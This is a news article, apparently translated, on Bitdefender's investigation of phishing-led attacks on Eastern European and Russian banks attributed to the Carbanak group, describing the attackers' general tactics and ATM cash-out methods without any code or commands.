Following Saturday’s announcement of the Romanian Intelligence Service (SRI) of a large-scale cyber attacks on Romanian banks, Bittdefender specialists give details of the attack and the alleged association of the attack with the Carbanak group.
Bitdefender’s global security solution maker has recently investigated a series of advanced cyber attacks targeting financial and banking institutions to steal huge amounts of money through concerted attacks.
During the investigation, Bitdefender specialists identified components of the Cobalt Strike arsenal – a member of the Carbanak crime group, known since 2013 for attacking over 100 banks in over 40 countries, responsible for financial damages of over one billion euros.
“The attacks were conducted through phishing campaigns sent to banks in Eastern Europe and Russia, generally in the first part of the week, Monday to Wednesday,” says Bitdefender’s security officer, Liviu Arsene.
Since March 2018, the phishing campaign has tried to trick bank employees into clicking infected links or downloading files from emails that were apparently sent by someone in their organization. After the attackers reached the target computer, they sought to obtain administrator privileges to infiltrate the company’s network. Computer criminals operated with surgical precision, so they only infected a small number of devices so they would remain as long as possible. Ideal victims were employees with high privileges and extended access rights to the company’s IT infrastructure.
To avoid detection, criminal groups often used file-free attack techniques, such as PowerShell or Cobalt Strike scripts, as well as legitimate applications frequently used to connect and remotely administer the victim’s terminal. In this case, the attackers were operating off-hours and were planning to get the money on weekends.
The FBI’s latest warning, triggered by the attack on the Cosmos bank, according to which a wave of cyber attacks could target financial-banking institutions, is corroborated with Bitdefender’s recent findings raising the alert level for banks in Eastern Europe and Russia.
Although it is too early to determine whether the USD 13.4 million bankruptcy from the Cosmos bank may be correlated with the attacks in Eastern Europe and Russia, the Bitdefender investigation might be related to the same global attack as the FBI had warned of.
The preferred mode of work in the final phase of these attacks involves the remote training of ATMs to issue cash at a predefined time, and members of the criminal group immediately collected money and transferred them to their own accounts. Another method was to modify account information databases while they were withdrawing money.